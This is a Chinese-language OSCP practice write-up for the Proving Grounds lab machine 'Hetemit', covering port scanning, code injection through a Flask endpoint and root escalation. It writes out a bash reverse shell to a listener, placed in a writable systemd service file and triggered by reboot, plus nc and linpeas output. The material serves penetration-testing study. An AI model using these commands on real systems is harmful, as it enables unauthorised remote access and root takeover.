前言
在未来将会持续更新Proving Grounds Practice内的靶机Write Up,近期本人也通过了OSCP考试,所以将打靶的所有笔记共享出来,所有的靶机推荐来源于以下链接:https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159
不过其中有一些机器已经不在Proving Grounds Practice中了,所以就没有了Write Up,本系列将有大约40台左右的机器,如果你在练习过程中遇到了困难,建议先自己进行挖掘,然后再查看Write Up,始终需要记得:Try Harder。
本文结构
一般来说本系列的Write Up将以以下的结构来进行
-
端口扫描 -
网页枚举或端口枚举 -
突破入口 -
特权提升
靶机名称 Hetemit | 难度:Intermediate
端口枚举
┌──(aaron㉿aacai)-[~/Desktop/Script/nmapAutomator]
└─$ ./nmapAutomator.sh -H 192.168.151.117 -t full
Running a full scan on 192.168.151.117
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
18000/tcp open biimenu
50000/tcp open ibm-db2
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.194
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)
| 256 74:dd:fa:f2:51:dd:74:38:2b:b2:ec:82:e5:91:82:28 (ECDSA)
|_ 256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: CentOS xE6x8Fx90xE4xBEx9BxE7x9Ax84 Apache HTTP xE6x9Cx8DxE5x8AxA1xE5x99xA8xE6xB5x8BxE8xAFx95xE9xA1xB5
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
18000/tcp open biimenu?
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)
|_http-server-header: Werkzeug/1.0.1 Python/3.6.8
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Unix
21 FTP
┌──(aaron㉿aacai)-[~/Desktop/Script/nmapAutomator]
└─$ ftp 192.168.151.117
Connected to 192.168.151.117.
220 (vsFTPd 3.0.3)
Name (192.168.151.117:aaron): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||22087|)
receive aborted. Waiting for remote to finish abort.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
421 Service not available, user interrupt. Connection closed.
ftp> exit
FTP允许匿名登录, 但是不能运行任何命令
80 HTTP
80端口只有一个apache的默认界面, 所以也没办法获取更多的信息
18000 Protomba
尝试去创建一个用户但是我没有邀请码, 所以创建用户失败.
50000
访问5000端口的时候展示了两个路径.
Generate展示了一个示例
Verify 只展示了一个code参数. 但如果我尝试使用code去进行一些运算, 它是可以运行的.
可以看到的是当我用post协议提交一个参数2*2, 返回来的结果为4, 那么就意味着这里可能存在着RCE, 并且 Werkzeug 是用python来进行开发的, 所以尝试使用 os.system 来进行反弹shell或许就能成功.
ok, 它是有效的, 现在我获取到了可交互式的反弹shell.
提权
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.29
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/home/cmeeks/.rvm/gems/ruby-2.6.3/bin:/home/cmeeks/.rvm/gems/ruby-2.6.3@global/bin:/home/cmeeks/.rvm/rubies/ruby-2.6.3/bin:/home/cmeeks/.local/bin:/home/cmeeks/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/home/cmeeks/.rvm/bin:/home/cmeeks/.rvm/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/pythonapp.service
/etc/systemd/system/multi-user.target.wants/pythonapp.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/railsapp.service could be executing some relative path
/etc/systemd/system/pythonapp.service
/etc/systemd/system/pythonapp.service could be executing some relative path
/etc/systemd/system/railsapp.service could be executing some relative path
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:18000 0.0.0.0:* LISTEN 1409/puma 4.3.6 (tc
tcp 0 0 0.0.0.0:50000 0.0.0.0:* LISTEN 1410/python3.6
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
tcp6 0 0 :::5355 :::* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for cmeeks on hetemit:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin:/bin:/usr/sbin:/usr/bin
User cmeeks may run the following commands on hetemit:
(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
cmeeks:x:1000:1000::/home/cmeeks:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(cmeeks) gid=1000(cmeeks) groups=1000(cmeeks)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=193(systemd-resolve) gid=193(systemd-resolve) groups=193(systemd-resolve)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=26(postgres) gid=26(postgres) groups=26(postgres)
uid=2(daemon[0m) gid=2(daemon[0m) groups=2(daemon[0m)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=59(tss) gid=59(tss) groups=59(tss)
uid=5(sync) gid=0(root) groups=0(root)
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=7(halt) gid=0(root) groups=0(root)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=991(unbound) gid=987(unbound) groups=987(unbound)
uid=992(rngd) gid=988(rngd) groups=988(rngd)
uid=993(chrony) gid=989(chrony) groups=989(chrony)
uid=994(sssd) gid=990(sssd) groups=990(sssd)
uid=995(cockpit-wsinstance) gid=992(cockpit-wsinstance) groups=992(cockpit-wsinstance)
uid=996(cockpit-ws) gid=993(cockpit-ws) groups=993(cockpit-ws)
uid=997(libstoragemgmt) gid=995(libstoragemgmt) groups=995(libstoragemgmt)
uid=998(polkitd) gid=996(polkitd) groups=996(polkitd)
uid=999(systemd-coredump) gid=997(systemd-coredump) groups=997(systemd-coredump)
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/ncat
/usr/bin/perl
/usr/sbin/ping
/usr/bin/python3
/usr/bin/python3.6
/home/cmeeks/.rvm/rubies/ruby-2.6.3/bin/ruby
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Analyzing PostgreSQL Files (limit 70)
Version: psql (PostgreSQL) 10.14
-rw-r--r-- 1 root root 268 Sep 15 2020 /etc/postgresql-setup/upgrade/postgresql.conf
id postgresql
major 9.2
data_default /var/pgsql/data
package postgresql-upgrade
engine /usr/lib64/pgsql/postgresql-9.2/bin
description "Upgrade data from system PostgreSQL version (PostgreSQL 9.2)"
redhat_sockets_hack no
-rw-r--r-- 1 root root 47 Sep 15 2020 /usr/lib/tmpfiles.d/postgresql.conf
d /var/run/postgresql 0755 postgres postgres -
╔══════════╣ Analyzing Jenkins Files (limit 70)
-rw------- 1 cmeeks cmeeks 32 Nov 12 2020 /home/cmeeks/register_hetemit/config/master.key
13d501513ae570e4d2e50edfa97de275
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
You have write privileges over /etc/systemd/system/pythonapp.service
这里显示用户cmeeks有权限去修改 pythonapp.service 里面的内容,查看一下这个配置文件的内容.
[cmeeks@hetemit tmp]$ cat /etc/systemd/system/pythonapp.service
cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
[cmeeks@hetemit tmp]$
在这里可以看到ExecStart在运行命令, 并且当前用户有权限去修改此配置, 所以修改成反弹shell的命令.
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.194/18000 0>&1'
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
然后使用sudo /sbin/reboot 来重启服务器, 等待一会就能接收到反弹shell
└─$ nc -nlvp 18000
listening on [any] 18000 ...
connect to [192.168.45.194] from (UNKNOWN) [192.168.151.117] 35558
bash: cannot set terminal process group (995): Inappropriate ioctl for device
bash: no job control in this shell
[root@hetemit restjson_hetemit]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@hetemit restjson_hetemit]# cd /root
[root@hetemit ~]# ls
anaconda-ks.cfg
proof.txt
[root@hetemit ~]# cat proof.txt
5746a9a08b069e01dff4670af94c88a0
[root@hetemit ~]# END
OSCP(Offensive Security Certified Professional),中文称国际注册渗透测试专家认证,是由Offensive Security推出的200等级的证书,主要面向领域:渗透测试。
OSCP 证书是一种技术性证书,涵盖渗透测试和攻击技术方面。持有此证书的人员已通过对目标网络进行渗透测试并获得管理员访问权限的实际考试。该证书是由 Offense Security 出品,考试内容涉及网络渗透测试、漏洞挖掘、漏洞利用等方面。OSCP 考试难度较高,需要实际的技能和经验,持有此证书可证明持有人具有深入了解渗透测试及相关攻击技术的实际能力。
如果你觉得本篇文章对你有帮助,点个关注好不好呢,还可以点个在看,感谢你的支持:)))))))))))))
联系我
WeChat ID:wengchensmile
Email Address: [email protected](个人)
原文始发于微信公众号(Aaron与安全的那些事):Proving Grounds Practice-Hetemit
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论